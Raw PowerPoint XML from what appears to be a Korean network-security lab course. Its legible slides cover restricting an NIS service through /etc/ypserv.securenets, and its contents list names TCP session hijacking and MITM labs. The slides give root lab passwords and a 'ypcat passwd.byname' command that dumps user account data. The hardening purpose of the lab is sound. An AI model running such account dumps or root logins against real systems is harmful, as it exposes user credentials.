                        <a:t>, iptables </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정보보호체계 정책 설정 및 로그 분석</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hunt-1.5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TCP Session </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>Hijacking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ettercap, etterfilter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MITM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11"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4D7BD8AC-070F-41CB-B7D4-63B4640DB0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ECB5CF1-2232-457D-A73D-73279AB3DA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6DE48B2-9D64-4425-A43C-5B6795DC74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2" action="ppaction://hlinksldjump"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{942E11D1-4386-4A24-9695-E23DE32F4F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007054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네트워크 실습</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 219">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE03927-5141-4536-ACA1-DC9479CA7525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3514477" y="1706862"/>
            <a:ext cx="5224861" cy="3597574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="그룹 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6552971E-404C-4FDE-8EEC-0FF9347DB7E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1FDF00EB-2DDE-4F62-B558-53AA7BEABF6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39CCB1A-1F7E-4228-BD9D-9DFBD95CC4E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9B7A121-EC2D-40EC-A2BA-8B055BB5B6A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54544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/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. NIS(+) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서비스 제한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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>(Network Information Service)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>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라고 불리는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RPC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서비스로서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portmap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다른 관련 서비스들과 함께 사용되어 동일한 도메인에 위치한 컴퓨터에 사용자명</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암호와 다른 기밀 정보를 배포하는 기능을 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서비스는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청취하기 때문에 보안에 취약합니다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10.10.1.0~127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범위안의 네트워크에서만 수용 할 수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>있도록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수정</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적절한 네트워크에서 들어오는 요청만 응답하도록 넷마스크</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네트워크 쌍을 입력해줘야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en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>NIS</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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 계정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>: root / 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 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 Linux / 10.10.1.166)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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>클라이언트</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6.5 / 10.10.1.133)</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4717446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10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> root@10.10.1.166</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터미널을 하나 더 실행시켜서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10.10.1.133(NIS Client) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(PW : root123)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> root@10.10.1.133</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10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>nis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ypbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ypbind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> start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NIS Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>telnet</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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # telnet localhost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gn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정상 접속 시 화면</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221">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20171223-DF75-40D6-9C77-50F6467676B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="3252" b="2449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="846887"/>
            <a:ext cx="5224441" cy="1880410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="그룹 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C81FBCD6-B0D9-421A-8D2E-A8B8D76DB134}"/>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3328414-DBDA-49F9-A5D7-74E77958BD6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1051287-CBCD-40EF-BD73-D48A2AF80B9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2CEDEC88-11E7-4649-B968-6C6C9B186B6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 name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB45E8BE-7802-4A74-9563-75EA4B9422E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3495234"/>
            <a:ext cx="5400040" cy="1431544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B70FC6C-80CA-4400-8F97-218A0725E651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777733" y="5694715"/>
            <a:ext cx="3985260" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{300E28FA-EB05-4E6C-A5CB-3677715E3F07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6366417" y="863071"/>
            <a:ext cx="5227320" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5BB7954-938B-4E6F-939C-3CDB7593BD1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143634" y="2024391"/>
            <a:ext cx="3695700" cy="1059180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61ECDCD0-D3D9-4D45-B8F9-987CCD709ACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6367745" y="3495234"/>
            <a:ext cx="5280660" cy="16078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7005894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make -C /var/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>yp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> (-C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>옵션 대문자 사용</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10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 사용자 추가 등 설정한 내용이 변경되면 해당 정보를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>갱신시켜야</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>현재 실습에서는 이 명령을 실행하지 않아도 실습 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6. 10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>NIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 등록된 사용자들의 정보를 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ypcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>passwd.byname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exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 접속 종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ exit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10.10.1.166(NIS Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>ypserv.securenets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정</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ypserv.securenets</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ESC + :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wq</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10.10.1.0~127 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>만 접속 가능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>9).  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재시작 하는 시간이 조금 걸릴 수 있음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 변경</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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2034BF7A-04D1-4A05-B3B2-CD7EC7430394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318378" y="782074"/>
            <a:ext cx="3764280" cy="1150620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA540F49-CF32-4939-843B-D5C41E49525F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230888" y="3288826"/>
            <a:ext cx="3733800" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295F93A3-D5A2-4CE2-962E-BAC61000373E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1425098" y="5045122"/>
            <a:ext cx="2857500" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D851D697-F5A5-4DA8-9A1D-C44B06106FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6291464" y="1156636"/>
            <a:ext cx="5400040" cy="3256407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431372B4-2078-4C89-B461-FF005923DF2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
